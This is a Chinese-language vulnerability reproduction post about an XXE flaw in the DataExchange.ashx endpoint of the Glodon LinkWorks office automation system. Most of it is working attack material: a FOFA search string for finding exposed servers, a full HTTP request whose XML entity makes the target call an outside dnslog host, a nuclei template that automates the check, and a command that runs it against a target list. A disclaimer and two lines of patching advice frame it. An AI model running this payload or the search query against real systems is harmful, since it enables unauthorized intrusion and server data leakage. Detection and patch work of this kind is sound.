[漏洞复现]广联达Linkworks DataExchange.ashx XXE漏洞

免责申明：本文内容为学习笔记分享，仅供技术学习参考，请勿用作违法用途，任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责，与本平台和发布者无关！！！

漏洞名称

广联达Linkworks DataExchange.ashx XXE漏洞

漏洞影响

广联达Linkworks办公OA

漏洞描述

广联达LinkWorks办公OA（Office Automation）是一款综合办公自动化系统，旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具，帮助企业管理和处理日常办公任务、流程和文档。该系统/GB/LK/Document/DataExchange/DataExchange.ashx接口存在XXE漏洞，攻击者可以在xml中构造恶意命令，会导致服务器数据泄露以及被远控。

FOFA搜索语句

body="Services/Identification/login.ashx" || header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"

漏洞复现

注册一个dnslog平台的账号，用于回显，如http://dnslog.pw/dns/?&monitor=true，注册好之后勾选自动刷新选项，然后向靶场发送如下数据包，让靶场解析xml数据然后访问dns

POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

在DNSlog平台能看到一条访问记录

漏洞复现成功

nuclei poc

poc文件内容如下

id: glodon-linkworks-DataExchange-xxe

info:
  name: 广联达Linkworks DataExchange.ashx XXE漏洞
  author: fgz
  severity: critical
  description: 广联达LinkWorks办公OA（Office Automation）是一款综合办公自动化系统，旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具，帮助企业管理和处理日常办公任务、流程和文档。该系统/GB/LK/Document/DataExchange/DataExchange.ashx接口存在XXE漏洞，攻击者可以在xml中构造恶意命令，会导致服务器数据泄露以及被远控。
  metadata:
    max-request: 1
    fofa-query: body="Services/Identification/login.ashx" || header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"
    verified: true
requests:
  - raw:
      - |+
        POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
        Sec-Purpose: prefetch;prerender
        Purpose: prefetch
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close
        Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
        
        ------WebKitFormBoundaryJGgV5l5ta05yAIe0
        Content-Disposition: form-data;name="SystemName"
        
        BIM
        ------WebKitFormBoundaryJGgV5l5ta05yAIe0
        Content-Disposition: form-data;name="Params"
        Content-Type: text/plain
        
        <?xml version="1.0" encoding="UTF-8"?>
        <!DOCTYPE test [
        <!ENTITY t SYSTEM "http://{{interactsh-url}}">
        ]
        >
        <test>&t;</test>
        ------WebKitFormBoundaryJGgV5l5ta05yAIe0--

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, "dns")
        condition: and

运行POC

nuclei.exe -t mypoc/广联达/glodon-linkworks-DataExchange-xxe.yaml -l data/广联达Linkworks.txt

修复建议

1、请关注厂商主页，联系厂商获取补丁。

2、请设置访问地址白名单。